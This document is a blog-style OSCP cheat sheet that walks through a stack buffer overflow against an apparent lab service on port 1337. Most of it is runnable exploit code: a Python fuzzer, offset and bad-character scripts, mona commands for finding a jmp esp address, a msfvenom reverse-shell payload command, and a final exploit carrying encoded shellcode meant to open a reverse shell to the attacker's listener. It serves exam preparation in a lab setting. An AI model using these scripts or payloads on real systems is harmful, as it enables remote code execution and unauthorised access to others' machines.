Buffer Overflow Cheat Sheet, Simple Method To Follow For Your OSCP Exams……
CONFIRMING VULNERABLE-APPS TO MAKE SURE SHELL CONNECTION IS ACTIVE, TEST THE FUNCTION FOR BUFFER STORING:-
nc <target_ip> <port>
FUZZING
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.201.115"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
USING PATTERN_CREATE.rb WITH THE BYTES OUTPUT FROM FUZZER FOR CRASH REPLICATION & CONTROLLING EIP:-
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
import socket
ip = "10.10.136.142"
port = 1337
prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
!mona findmsp -distance 3000
import socket
ip = "10.10.136.142"
port = 1337
prefix = "OVERFLOW1 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
FINDING BAD CHARACTERS
Let Create a working Directory First
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \x01 to \xff;
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
import socket
ip = "10.10.136.142"
port = 1337
prefix = "OVERFLOW1 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
!mona compare -f C:\mona\oscp\bytearray.bin -a < ESP-address>
A popup window should appear labelled “mona Memory comparison results”. If not, use the Window menu to switch to it. The window shows the results of the comparison, indicating any characters that are different in memory to what they are in the generated bytearray.bin file.
Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.
The first badchar in the list should be the null byte (\x00) since we already removed it from the file. Make a note of any others.
FINDING A JUMP POINT:-
!mona jmp -r esp -cpb "\x00\x16\x2f\xf4\xfd"
This command finds all “jmp esp” (or equivalent) instructions with addresses that don’t contain any of the badchars specified.
Now setting the “retn” variable to the address, written backwards (since the system is little endian). For example if the address is \x01\x02\x03\x04 in Immunity, write it as \x04\x03\x02\x01 in your exploit.
GENERATE PAYLOAD:-
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "x00\x16\x2f\xf4\xfd" -f py
PREPEND NOPS:-
Since an encoder was likely used to generate the payload, you will need some space in memory for the payload to unpack itself. You can do this by setting the padding variable to a string of 16 or more “No Operation” (\x90) bytes:
padding = "\x90" * 16
OUR FINAL EXPLOIT!
#!/usr/bin/env python2
import socket
RHOST = "10.10.136.142"
RPORT = 1337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
buf = ""
buf += "OVERFLOW5 "
buf += "A" * 314 + b"\xaf\x11\x50\x62" + "\x90" * 16
buf += b"\xfc\xbb\x8c\xdf\xd9\x41\xeb\x0c\x5e\x56\x31\x1e\xad"
buf += b"\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x70"
buf += b"\x37\x5b\x41\x88\xc8\x3c\xcb\x6d\xf9\x7c\xaf\xe6\xaa"
buf += b"\x4c\xbb\xaa\x46\x26\xe9\x5e\xdc\x4a\x26\x51\x55\xe0"
buf += b"\x10\x5c\x66\x59\x60\xff\xe4\xa0\xb5\xdf\xd5\x6a\xc8"
buf += b"\x1e\x11\x96\x21\x72\xca\xdc\x94\x62\x7f\xa8\x24\x09"
buf += b"\x33\x3c\x2d\xee\x84\x3f\x1c\xa1\x9f\x19\xbe\x40\x73"
buf += b"\x12\xf7\x5a\x90\x1f\x41\xd1\x62\xeb\x50\x33\xbb\x14"
buf += b"\xfe\x7a\x73\xe7\xfe\xbb\xb4\x18\x75\xb5\xc6\xa5\x8e"
buf += b"\x02\xb4\x71\x1a\x90\x1e\xf1\xbc\x7c\x9e\xd6\x5b\xf7"
buf += b"\xac\x93\x28\x5f\xb1\x22\xfc\xd4\xcd\xaf\x03\x3a\x44"
buf += b"\xeb\x27\x9e\x0c\xaf\x46\x87\xe8\x1e\x76\xd7\x52\xfe"
buf += b"\xd2\x9c\x7f\xeb\x6e\xff\x17\xd8\x42\xff\xe7\x76\xd4"
buf += b"\x8c\xd5\xd9\x4e\x1a\x56\x91\x48\xdd\x99\x88\x2d\x71"
buf += b"\x64\x33\x4e\x58\xa3\x67\x1e\xf2\x02\x08\xf5\x02\xaa"
buf += b"\xdd\x5a\x52\x04\x8e\x1a\x02\xe4\x7e\xf3\x48\xeb\xa1"
buf += b"\xe3\x73\x21\xca\x8e\x8e\xa2\xff\x46\x90\xae\x68\x55"
buf += b"\x90\xdf\x34\xd0\x76\xb5\xd4\xb4\x21\x22\x4c\x9d\xb9"
buf += b"\xd3\x91\x0b\xc4\xd4\x1a\xb8\x39\x9a\xea\xb5\x29\x4b"
buf += b"\x1b\x80\x13\xda\x24\x3e\x3b\x80\xb7\xa5\xbb\xcf\xab"
buf += b"\x71\xec\x98\x1a\x88\x78\x35\x04\x22\x9e\xc4\xd0\x0d"
buf += b"\x1a\x13\x21\x93\xa3\xd6\x1d\xb7\xb3\x2e\x9d\xf3\xe7"
buf += b"\xfe\xc8\xad\x51\xb9\xa2\x1f\x0b\x13\x18\xf6\xdb\xe2"
buf += b"\x52\xc9\x9d\xea\xbe\xbf\x41\x5a\x17\x86\x7e\x53\xff"
buf += b"\x0e\x07\x89\x9f\xf1\xd2\x09\xbf\x13\xf6\x67\x28\x8a"
buf += b"\x93\xc5\x35\x2d\x4e\x09\x40\xae\x7a\xf2\xb7\xae\x0f"
buf += b"\xf7\xfc\x68\xfc\x85\x6d\x1d\x02\x39\x8d\x34\x02\xbd"
buf += b"\x71\xb7"
buf += "\n"
s.send(buf)
NOTE:- Are You Confuse How i Got The "\xaf\x11\x50\x62" I Change One Of The Pointer I Got 625011AF To Be Written Backwards And Why Is That?? Because The System Is Little Endian.
If we have everything correct running the exploit should give us a reverse shell back to our ncat listner.
Some Intersting Buffer Overflow Challenges To Try Out;-
Greeting From Muzec